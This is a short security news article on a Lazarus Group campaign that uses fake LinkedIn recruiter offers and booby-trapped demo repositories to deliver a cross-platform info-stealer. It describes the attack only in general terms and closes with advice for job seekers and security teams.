Bitdefender Labs has uncovered a new cyber-espionage campaign tied to the North Korea-linked Lazarus Group, and it leans heavily on social engineering. Attackers are approaching professionals on LinkedIn with fake job opportunities meant to steal credentials and install malware. It’s another example of how threat actors use trusted platforms, and people’s career goals, to get a foot in the door.
It starts with a message that looks like a real recruiter outreach. The target is offered a remote, part-time role that seems to match their background. The tone is friendly and professional, and it often feels personal enough to earn a reply. Once the target engages, the attacker asks for personal details as part of the “hiring process,” building credibility while gathering information that can be used later.
How the Fake LinkedIn Job Offer Delivers Malware
Next, the attacker shares a repository that supposedly contains a “minimum viable product” (MVP). Alongside the code is a document with technical questions. The target is told they need to run the demo project to answer those questions, which adds pressure and makes the request feel like a normal skills assessment.
On the surface, the project appears functional. Under the hood, Bitdefender researchers found heavily obfuscated scripts designed to hide what’s really happening. When the demo runs, those scripts pull down additional malicious code from a third-party source, helping the attackers slip past basic checks and deliver the real payload with less scrutiny.
Cross-Platform Info-Stealer Targets Crypto and Login Data
The payload is a cross-platform information stealer that can run on Windows, macOS, and Linux. Once it’s active, it hunts for high-value data, including crypto-related browser extensions, saved login credentials, and sensitive files that may contain financial or internal business information.
The malware then quietly exfiltrates what it collects to a command-and-control server, keeping noise low to reduce the chance of detection. After that, it downloads and runs a Python script to enable follow-on activity, which can expand access and increase the impact of the compromise.
What makes this campaign especially risky is the blend of persuasion and technical misdirection. LinkedIn is a familiar, trusted platform, and many people are open to new roles, so they’re more likely to engage and follow “assessment” instructions without realizing the risk.
Security teams recommend treating unsolicited job offers with extra caution, especially when they involve running code or downloading files. Repositories shared by unknown recruiters should be considered suspicious by default. If you need to review a project, use an isolated environment, verify the employer independently, and confirm the recruiter’s identity through trusted channels.
Ultimately, the takeaway is simple: even reputable platforms can be used as an entry point. Staying skeptical, and slowing down before running anything, can prevent a bad day from turning into a breach.
